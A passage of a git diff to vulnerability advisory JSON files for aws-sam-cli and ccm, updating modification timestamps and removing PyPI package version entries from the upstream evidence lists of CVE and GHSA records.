[ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-37891.json b/advisories/BREW-aws-sam-cli-CVE-2024-37891.json index 6306b62162..ba320dec6a 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-37891.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-37891", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-47081.json b/advisories/BREW-aws-sam-cli-CVE-2024-47081.json index 647457e3c2..2032a11571 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-47081.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-47081", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-49766.json b/advisories/BREW-aws-sam-cli-CVE-2024-49766.json index 11c261beed..050583ef06 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-49766.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-49766.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-49766", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-f9vj-2wh5-fj8j", "CVE-2024-49766", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-49767.json b/advisories/BREW-aws-sam-cli-CVE-2024-49767.json index 12273a1f3a..5d3e075fd1 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-49767.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-49767.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-49767", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-q34m-jh98-gwm2", "CVE-2024-49767", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-56201.json b/advisories/BREW-aws-sam-cli-CVE-2024-56201.json index 808254adeb..208e3178fc 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-56201.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-56201.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-56201", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-gmj6-6f8f-6699", "CVE-2024-56201", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-56326.json b/advisories/BREW-aws-sam-cli-CVE-2024-56326.json index 8424157941..2b8df56ce4 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-56326.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-56326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-56326", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-q2x7-8rv6-6q7h", "CVE-2024-56326", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-6345.json b/advisories/BREW-aws-sam-cli-CVE-2024-6345.json index d6112c8498..f1ed833155 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-6345.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-6345", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-27516.json b/advisories/BREW-aws-sam-cli-CVE-2025-27516.json index accab701f2..59dee5a941 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-27516.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-27516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-27516", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-cpwx-vrp4-4pq7", "CVE-2025-27516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-3047.json b/advisories/BREW-aws-sam-cli-CVE-2025-3047.json index a0d1a6b06a..758d032ca1 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-3047.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-3047.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-3047", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "CVE-2025-3047", "GHSA-px37-jpqx-97q9", @@ -47,13 +47,6 @@ "subject_version": "1.166.1", "key": "https://github.com/aws/aws-sam-cli" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aws-sam-cli", - "subject_version": "1.166.1", - "key": "pkg:pypi/aws-sam-cli@1.166.1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-3048.json b/advisories/BREW-aws-sam-cli-CVE-2025-3048.json index 7d3ae1b7ec..d8f966c579 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-3048.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-3048.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-3048", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "CVE-2025-3048", "GHSA-pp64-wj43-xqcr", @@ -47,13 +47,6 @@ "subject_version": "1.166.1", "key": "https://github.com/aws/aws-sam-cli" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aws-sam-cli", - "subject_version": "1.166.1", - "key": "pkg:pypi/aws-sam-cli@1.166.1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-47273.json b/advisories/BREW-aws-sam-cli-CVE-2025-47273.json index af0f811145..1bd537f037 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-47273.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-47273", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-47278.json b/advisories/BREW-aws-sam-cli-CVE-2025-47278.json index c269ee03d1..871938c19e 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-47278.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-47278.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-47278", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-4grg-w6v8-c28g", "CVE-2025-47278", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "flask", - "subject_version": "3.1.3", - "key": "pkg:pypi/flask@3.1.3", - "resource": "flask" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-50181.json b/advisories/BREW-aws-sam-cli-CVE-2025-50181.json index 28325f160c..ec63ea815d 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-50181.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-50181", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-50182.json b/advisories/BREW-aws-sam-cli-CVE-2025-50182.json index e23ea1bf0a..ada6bf1c60 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-50182.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-50182", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-66221.json b/advisories/BREW-aws-sam-cli-CVE-2025-66221.json index 50887e2de5..6709661787 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-66221.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-66221.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-66221", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-hgf8-39gv-g3f2", "CVE-2025-66221", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-66418.json b/advisories/BREW-aws-sam-cli-CVE-2025-66418.json index 0be1173e8a..3fdd7c66aa 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-66418.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-66418", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-66471.json b/advisories/BREW-aws-sam-cli-CVE-2025-66471.json index c3a0d17f5a..c703c6fd68 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-66471.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-66471", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-21441.json b/advisories/BREW-aws-sam-cli-CVE-2026-21441.json index 2bccba19df..b7c7e9ec15 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-21441.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-21441", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-21860.json b/advisories/BREW-aws-sam-cli-CVE-2026-21860.json index 993be71cee..9bd5ba0bfe 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-21860.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-21860.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-21860", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-87hc-h4r5-73f7", "CVE-2026-21860", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-24049.json b/advisories/BREW-aws-sam-cli-CVE-2026-24049.json index 64f49f02db..b2ec470092 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-24049.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-24049.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-24049", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-8rrh-rw8j-w5fx", "CVE-2026-24049", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "wheel", - "subject_version": "0.48.0", - "key": "pkg:pypi/wheel@0.48.0", - "resource": "wheel" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-25645.json b/advisories/BREW-aws-sam-cli-CVE-2026-25645.json index 570c347f1c..17d17801aa 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-25645.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-25645", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-27199.json b/advisories/BREW-aws-sam-cli-CVE-2026-27199.json index 73af0a7079..da66000870 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-27199.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-27199.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-27199", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-29vq-49wr-vm6x", "CVE-2026-27199", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-27205.json b/advisories/BREW-aws-sam-cli-CVE-2026-27205.json index 394ee2284e..6eae4caa10 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-27205.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-27205.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-27205", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-68rp-wp8r-4726", "CVE-2026-27205", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "flask", - "subject_version": "3.1.3", - "key": "pkg:pypi/flask@3.1.3", - "resource": "flask" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-27448.json b/advisories/BREW-aws-sam-cli-CVE-2026-27448.json index 3c1f2704da..56a8cff5c0 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-27448.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-27448.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-27448", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-vp96-hxj8-p424", "CVE-2026-27448", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-27459.json b/advisories/BREW-aws-sam-cli-CVE-2026-27459.json index 9792796371..73db984167 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-27459.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-27459.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-27459", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-5pwr-322w-8jr4", "CVE-2026-27459", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-28684.json b/advisories/BREW-aws-sam-cli-CVE-2026-28684.json index 6b3d482d40..bed4b2a421 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-28684.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-28684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-28684", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-mf9w-mj56-hr94", "CVE-2026-28684", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-dotenv", - "subject_version": "1.2.3", - "key": "pkg:pypi/python-dotenv@1.2.3", - "resource": "python-dotenv" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-44431.json b/advisories/BREW-aws-sam-cli-CVE-2026-44431.json index e3b16cd47b..357c69d166 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-44431.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-44431", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-44432.json b/advisories/BREW-aws-sam-cli-CVE-2026-44432.json index 88cd7b6102..696db82ae5 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-44432.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-44432", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-4539.json b/advisories/BREW-aws-sam-cli-CVE-2026-4539.json index 135213b8ea..f8716eb759 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-4539.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-4539", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-45409.json b/advisories/BREW-aws-sam-cli-CVE-2026-45409.json index a5b51ca6d4..29ce76bce1 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-45409.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-45409", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-59890.json b/advisories/BREW-aws-sam-cli-CVE-2026-59890.json index 58ca373914..3e9fd4d980 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-59890.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-59890", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2013-1633.json b/advisories/BREW-ccm-CVE-2013-1633.json index 4dc765434e..06a1acc358 100644 --- a/advisories/BREW-ccm-CVE-2013-1633.json +++ b/advisories/BREW-ccm-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2013-1633", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2017-18342.json b/advisories/BREW-ccm-CVE-2017-18342.json index aa918a2299..3dd37cdabd 100644 --- a/advisories/BREW-ccm-CVE-2017-18342.json +++ b/advisories/BREW-ccm-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": 